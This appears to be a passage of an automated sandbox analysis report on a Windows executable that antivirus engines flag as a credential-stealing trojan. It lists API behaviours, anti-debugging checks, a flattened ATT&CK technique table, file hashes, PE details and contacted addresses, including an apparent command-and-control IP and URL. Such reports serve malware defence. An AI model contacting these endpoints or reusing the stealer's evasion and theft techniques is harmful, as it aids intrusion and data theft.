          Source: C:\Users\user\Desktop\12E56QE1Fc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeFile opened: C:\Windows\SysWOW64\msvcr100.dllJump to behavior
          Source: 12E56QE1Fc.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: C:\ralopim\sowofej.pdb source: 12E56QE1Fc.exe
          Source: Binary string: r\runtime\crypt\tmp_776930745\bin\fasofunox.pdb source: 12E56QE1Fc.exe
          Source: Binary string: <C:\ralopim\sowofej.pdbr\runtime\crypt\tmp_776930745\bin\fasofunox.pdbp source: 12E56QE1Fc.exe

          Data Obfuscation

          barindex
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeUnpacked PE file: 0.2.12E56QE1Fc.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.idata:W;.rsrc:R;.reloc:R; vs CODE:ER;DATA:W;BSS:W;.idata:W;.reloc:R;
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00418124 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WSAStartup,socket,gethostbyname,htons,connect,send,closesocket,0_2_00418124
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0040D86E push 0040D89Ch; ret 0_2_0040D894
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0040D870 push 0040D89Ch; ret 0_2_0040D894
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_004140C0 push 004140ECh; ret 0_2_004140E4
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_004108C8 push 004108F4h; ret 0_2_004108EC
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0040B0F7 push 0040B124h; ret 0_2_0040B11C
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0040B0F8 push 0040B124h; ret 0_2_0040B11C
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00408080 push 004080B8h; ret 0_2_004080B0
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00408158 push 00408196h; ret 0_2_0040818E
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00408970 push 004089E4h; ret 0_2_004089DC
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00408994 push 004089E4h; ret 0_2_004089DC
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_004089AC push 004089E4h; ret 0_2_004089DC
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00415208 push 0041528Ch; ret 0_2_00415284
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0040CA0C push 0040CA3Ch; ret 0_2_0040CA34
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0040CA10 push 0040CA3Ch; ret 0_2_0040CA34
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00417AEC push 00417B18h; ret 0_2_00417B10
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00404BC0 push 00404C11h; ret 0_2_00404C09
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0040D3C0 push 0040D3ECh; ret 0_2_0040D3E4
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0040A3E4 push 0040A410h; ret 0_2_0040A408
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0040C390 push 0040C3C0h; ret 0_2_0040C3B8
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0040C394 push 0040C3C0h; ret 0_2_0040C3B8
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0040A3AC push 0040A3D8h; ret 0_2_0040A3D0
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0040DC44 push 0040DCA3h; ret 0_2_0040DC9B
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0040DC0C push 0040DC38h; ret 0_2_0040DC30
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0040B41E push 0040B44Ch; ret 0_2_0040B444
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0040B420 push 0040B44Ch; ret 0_2_0040B444
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0040A438 push 0040A464h; ret 0_2_0040A45C
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0041A4F4 push 0041A51Ah; ret 0_2_0041A512
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00414C80 push 00414CACh; ret 0_2_00414CA4
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00409488 push 004094B8h; ret 0_2_004094B0
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0041A4AC push 0041A4E8h; ret 0_2_0041A4E0
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00418CB8 push 00418CE8h; ret 0_2_00418CE0
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00417B1A LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,0_2_00417B1A
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeSystem information queried: CurrentTimeZoneInformationJump to behavior
          Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0041303C FindFirstFileW,FindNextFileW,FindClose,0_2_0041303C
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_004111C4 FindFirstFileW,FindNextFileW,FindClose,0_2_004111C4
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,0_2_00414408
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00414408 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose,0_2_00414408
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,0_2_00412D70
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,0_2_00412D70
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00412D70 FindFirstFileW,FindNextFileW,FindClose,0_2_00412D70
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0041158C FindFirstFileW,FindNextFileW,FindClose,0_2_0041158C
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00411590 FindFirstFileW,FindNextFileW,FindClose,0_2_00411590
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00412D9C FindFirstFileW,FindNextFileW,FindClose,0_2_00412D9C
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00416740 GetSystemInfo,0_2_00416740
          Source: 12E56QE1Fc.exe, 00000000.00000002.2059464987.00000000007F2000.00000004.00000020.00020000.00000000.sdmp, 12E56QE1Fc.exe, 00000000.00000002.2059464987.000000000079C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
          Source: 12E56QE1Fc.exe, 00000000.00000002.2059464987.00000000007F2000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW]
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00429D55 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00429D55
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00418124 GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,WSAStartup,socket,gethostbyname,htons,connect,send,closesocket,0_2_00418124
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00407A34 mov eax, dword ptr fs:[00000030h]0_2_00407A34
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_0078537F mov eax, dword ptr fs:[00000030h]0_2_0078537F
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00785374 mov eax, dword ptr fs:[00000030h]0_2_00785374
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_007857E4 mov eax, dword ptr fs:[00000030h]0_2_007857E4
          Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00427CA1 SetUnhandledExceptionFilter,0_2_00427CA1
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00429D55 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00429D55
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_004275D1 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_004275D1
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: GetLocaleInfoA,0_2_00404B4C
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,0_2_00430942
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,0_2_004329EE
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,0_2_0042F2C8
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,0_2_00432AE3
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,0_2_00432B8A
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,__calloc_crt,_free,GetLocaleInfoW,0_2_004294E6
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,0_2_0042E4BB
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,0_2_00432DB6
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: EnumSystemLocalesA,0_2_00432E78
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: _strlen,_strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00432EA2
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,_strcpy_s,__invoke_watson,__itow_s,0_2_00432F45
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,_free,_free,0_2_0042FF54
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,0_2_00432F09
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00428BFF GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_00428BFF
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_004065CC GetUserNameW,0_2_004065CC
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeCode function: 0_2_00404C15 GetCommandLineA,GetVersion,GetVersion,GetThreadLocale,GetThreadLocale,GetCurrentThreadId,0_2_00404C15
          Source: C:\Users\user\Desktop\12E56QE1Fc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information

          barindex
          Source: Yara matchFile source: 0.2.12E56QE1Fc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.12E56QE1Fc.exe.2130000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.12E56QE1Fc.exe.2130000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.12E56QE1Fc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 12E56QE1Fc.exe PID: 6508, type: MEMORYSTR
          Source: Yara matchFile source: 0.2.12E56QE1Fc.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.12E56QE1Fc.exe.2130000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.3.12E56QE1Fc.exe.2130000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.12E56QE1Fc.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
          Source: Yara matchFile source: Process Memory Space: 12E56QE1Fc.exe PID: 6508, type: MEMORYSTR
          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
          Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
          Native API
          1
          DLL Side-Loading
          1
          DLL Side-Loading
          1
          Deobfuscate/Decode Files or Information
          OS Credential Dumping11
          System Time Discovery
          Remote Services1
          Archive Collected Data
          2
          Encrypted Channel
          Exfiltration Over Other Network MediumAbuse Accessibility Features
          CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts2
          Obfuscated Files or Information
          LSASS Memory11
          Security Software Discovery
          Remote Desktop ProtocolData from Removable Media3
          Ingress Tool Transfer
          Exfiltration Over BluetoothNetwork Denial of Service
          Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
          Software Packing
          Security Account Manager1
          Account Discovery
          SMB/Windows Admin SharesData from Network Shared Drive2
          Non-Application Layer Protocol
          Automated ExfiltrationData Encrypted for Impact
          Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
          DLL Side-Loading
          NTDS1
          System Owner/User Discovery
          Distributed Component Object ModelInput Capture112
          Application Layer Protocol
          Traffic DuplicationData Destruction
          Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA Secrets1
          File and Directory Discovery
          SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC ScriptsSteganographyCached Domain Credentials15
          System Information Discovery
          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
          Hide Legend

          Legend:

          • Process
          • Signature
          • Created File
          • DNS/IP Info
          • Is Dropped
          • Is Windows Process
          • Number of created Registry Values
          • Number of created Files
          • Visual Basic
          • Delphi
          • Java
          • .Net C# or VB.NET
          • C, C++ or other language
          • Is malicious
          • Internet

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          12E56QE1Fc.exe73%VirustotalBrowse
          12E56QE1Fc.exe88%ReversingLabsWin32.Trojan.Sodinokibi
          12E56QE1Fc.exe100%AviraTR/AD.MoksSteal.bwra
          12E56QE1Fc.exe100%Joe Sandbox ML
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/0%Avira URL Cloudsafe
          http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php%0%Avira URL Cloudsafe
          http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.phpA0%Avira URL Cloudsafe
          http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php0%Avira URL Cloudsafe
          https://dotbit.me/a/0%Avira URL Cloudsafe
          No contacted domains info
          NameMaliciousAntivirus DetectionReputation
          http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.phptrue
          • Avira URL Cloud: safe
          unknown
          NameSourceMaliciousAntivirus DetectionReputation
          http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/12E56QE1Fc.exe, 00000000.00000002.2059464987.00000000007D7000.00000004.00000020.00020000.00000000.sdmptrue
          • Avira URL Cloud: safe
          unknown
          http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.php%12E56QE1Fc.exe, 00000000.00000002.2059464987.00000000007D7000.00000004.00000020.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://51.15.142.235/1/3D890117-1CEB-4558-BA94-0C64E21A9504/index.phpA12E56QE1Fc.exe, 00000000.00000003.2057437868.0000000002330000.00000004.00001000.00020000.00000000.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://ip-api.com/json12E56QE1Fc.exe, 12E56QE1Fc.exe, 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, 12E56QE1Fc.exe, 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
            high
            https://dotbit.me/a/12E56QE1Fc.exe, 12E56QE1Fc.exe, 00000000.00000003.2041261035.0000000002130000.00000004.00001000.00020000.00000000.sdmp, 12E56QE1Fc.exe, 00000000.00000002.2058611187.0000000000400000.00000040.00000001.01000000.00000003.sdmpfalse
            • Avira URL Cloud: safe
            unknown
            • No. of IPs < 25%
            • 25% < No. of IPs < 50%
            • 50% < No. of IPs < 75%
            • 75% < No. of IPs
            IPDomainCountryFlagASNASN NameMalicious
            51.15.142.235
            unknownFrance
            12876OnlineSASFRtrue
            Joe Sandbox version:42.0.0 Malachite
            Analysis ID:1589148
            Start date and time:2025-01-11 12:01:08 +01:00
            Joe Sandbox product:CloudBasic
            Overall analysis duration:0h 2m 5s
            Hypervisor based Inspection enabled:false
            Report type:full
            Cookbook file name:default.jbs
            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
            Number of analysed new started processes analysed:2
            Number of new started drivers analysed:0
            Number of existing processes analysed:0
            Number of existing drivers analysed:0
            Number of injected processes analysed:0
            Technologies:
            • HCA enabled
            • EGA enabled
            • AMSI enabled
            Analysis Mode:default
            Analysis stop reason:Timeout
            Sample name:12E56QE1Fc.exe
            renamed because original name is a hash value
            Original Sample Name:289c12d43aa35c8c8bf22bace3358cde.exe
            Detection:MAL
            Classification:mal100.troj.spyw.evad.winEXE@1/0@0/1
            EGA Information:
            • Successful, ratio: 100%
            HCA Information:
            • Successful, ratio: 100%
            • Number of executed functions: 29
            • Number of non-executed functions: 76
            Cookbook Comments:
            • Found application associated with file extension: .exe
            • Stop behavior analysis, all processes terminated
            • Exclude process from analysis (whitelisted): dllhost.exe
            • Report size getting too big, too many NtQueryValueKey calls found.
            No simulations
            No context
            No context
            MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
            OnlineSASFR4.elfGet hashmaliciousUnknownBrowse
            • 51.158.21.37
            miori.sh4.elfGet hashmaliciousUnknownBrowse
            • 212.129.5.22
            https://antiphishing.vadesecure.com/v4?f=bnJjU3hQT3pQSmNQZVE3aOMl-Yxz6sxP-_mvIRuY-wdnZ1bXTFIOIwMxyCDi0KedKx4XzS44_P2zUeNIsKUb0ScW6k1yl1_sQ4IsBBcClSw_vWV34HFG0fKKBNYTYHpo&i=SGI0YVJGNmxZNE90Z2thMHUqf298Dc88cJEXrW3w1lA&k=dFBm&r=SW5LV3JodE9QZkRVZ3JEYa6kbR5XAzhHFJ0zbTQRADrRG7ugnfE15pwrEQUVhgv3E2tVXwBw8NfFSkf3wOZ0VA&s=ecaab139c1f3315ccc0d88a6451dccec431e8ce1d856e71e5109e33657c13a3c&u=https%3A%2F%2Fsender5.zohoinsights-crm.com%2Fck1%2F2d6f.327230a%2F5f929700-cca4-11ef-973d-525400f92481%2F4cb2ae4047e7a38310b2b2641663917c123a5dec%2F2%3Fe%3DGKxHQ%252FSSm8D%252B%252B3g8VEcICaLHKdekhRU94ImygZ37tRI%253DGet hashmaliciousUnknownBrowse
            • 163.172.240.109
            Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
            • 212.129.3.113
            Mes_Drivers_3.0.4.exeGet hashmaliciousUnknownBrowse
            • 212.129.3.112
            hiwA7Blv7C.exeGet hashmaliciousXmrigBrowse
            • 51.15.58.224
            8p5iD52knN.exeGet hashmaliciousAzorultBrowse
            • 51.15.241.168
            loligang.x86.elfGet hashmaliciousMiraiBrowse
            • 212.129.47.239
            arm5.nn.elfGet hashmaliciousMirai, OkiruBrowse
            • 62.210.51.189
            nsharm5.elfGet hashmaliciousMiraiBrowse
            • 51.159.173.14
            No context
            No context
            No created / dropped files found
            File type:PE32 executable (GUI) Intel 80386, for MS Windows
            Entropy (8bit):6.013521703464125
            TrID:
            • Win32 Executable (generic) a (10002005/4) 99.96%
            • Generic Win/DOS Executable (2004/3) 0.02%
            • DOS Executable Generic (2002/1) 0.02%
            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
            File name:12E56QE1Fc.exe
            File size:344'576 bytes
            MD5:289c12d43aa35c8c8bf22bace3358cde
            SHA1:1395cfe674d743b8fe568ef373bd91ae7b030adf
            SHA256:1254f59c4d71b8cdf0601467e71c8d868f14195b9b27479fa82d19f9eb7dfc0c
            SHA512:19ac64147172d76855be6b4ba0c40c8017ece18039ddf12aaa357dc3fc9ddc6afa9841210daefe339076c4182ac1123037f966a65c9e15bfcb5848d33a6c47bd
            SSDEEP:6144:q+okc8afrZ3T9xk2g02IZPQFOtll1oemYO62LRTTRO:VoV9DJTPk2gnoPQFS1Dm162tJ
            TLSH:6574CF1467D6C431E81365B89669C3B24E7A3C786351A8CF6FC75AB64F393E0E63430A
            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........................v.......B.......{...............C.......r.......u.....Rich....................PE..L.....J[...................
            Icon Hash:4d2a2a5c31614d6d
            Entrypoint:0x425f1d
            Entrypoint Section:.text
            Digitally signed:false
            Imagebase:0x400000
            Subsystem:windows gui
            Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
            DLL Characteristics:TERMINAL_SERVER_AWARE
            Time Stamp:0x5B4A11CC [Sat Jul 14 15:07:56 2018 UTC]
            TLS Callbacks:
            CLR (.Net) Version:
            OS Version Major:5
            OS Version Minor:1
            File Version Major:5
            File Version Minor:1
            Subsystem Version Major:5
            Subsystem Version Minor:1
            Import Hash:0ee9cfa9b63c2db5b2719d73b966f7f1
            Instruction
            call 00007F307086EC02h
            jmp 00007F307086BDAEh
            mov edi, edi
            push ebp
            mov ebp, esp
            mov eax, dword ptr [ebp+08h]
            xor ecx, ecx
            cmp eax, dword ptr [00441CC8h+ecx*8]
            je 00007F307086BF35h
            inc ecx
            cmp ecx, 2Dh
            jc 00007F307086BF13h
            lea ecx, dword ptr [eax-13h]
            cmp ecx, 11h
            jnbe 00007F307086BF30h
            push 0000000Dh
            pop eax
            pop ebp
            ret
            mov eax, dword ptr [00441CCCh+ecx*8]
            pop ebp
            ret
            add eax, FFFFFF44h
            push 0000000Eh
            pop ecx
            cmp ecx, eax
            sbb eax, eax
            and eax, ecx
            add eax, 08h
            pop ebp
            ret
            call 00007F307086E5DBh
            test eax, eax
            jne 00007F307086BF28h
            mov eax, 00441E30h
            ret
            add eax, 08h
            ret
            call 00007F307086E5C8h
            test eax, eax
            jne 00007F307086BF28h
            mov eax, 00441E34h
            ret
            add eax, 0Ch
            ret
            mov edi, edi
            push ebp
            mov ebp, esp
            push esi
            call 00007F307086BF07h
            mov ecx, dword ptr [ebp+08h]
            push ecx
            mov dword ptr [eax], ecx
            call 00007F307086BEA7h
            pop ecx
            mov esi, eax
            call 00007F307086BEE1h
            mov dword ptr [eax], esi
            pop esi
            pop ebp
            ret
            mov edi, edi
            push ebp
            mov ebp, esp
            call 00007F307086E58Dh
            test eax, eax
            jne 00007F307086BF27h
            push 0000000Ch
            pop eax
            pop ebp
            ret
            call 00007F307086BEC4h
            mov ecx, dword ptr [ebp+08h]
            mov dword ptr [eax], ecx
            xor eax, eax
            pop ebp
            ret
            mov edi, edi
            push ebp
            mov ebp, esp
            push esi
            mov esi, dword ptr [ebp+08h]
            test esi, esi
            jne 00007F307086BF2Ch
            call 00007F307086D6DAh
            Programming Language:
            • [ASM] VS2010 build 30319
            • [ C ] VS2010 build 30319
            • [IMP] VS2008 SP1 build 30729
            • [C++] VS2010 build 30319
            • [RES] VS2010 build 30319
            • [LNK] VS2010 build 30319
            NameVirtual AddressVirtual Size Is in Section
            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IMPORT0xed0000x3c.idata
            IMAGE_DIRECTORY_ENTRY_RESOURCE0xef0000xf88c.rsrc
            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
            IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
            IMAGE_DIRECTORY_ENTRY_BASERELOC0xff0000xd78.reloc
            IMAGE_DIRECTORY_ENTRY_DEBUG0x3cc500x1c.rdata
            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_IAT0xed2500x214.idata
            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
            .text0x10000x3ac680x3ae001ffbe9b77fa888c056d93c38dc2b73bfFalse0.5287080347664543data6.190134322987069IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
